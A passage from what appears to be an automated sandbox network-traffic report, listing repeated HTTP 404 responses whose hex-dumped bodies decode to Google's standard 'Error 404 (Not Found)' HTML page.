6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:11:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 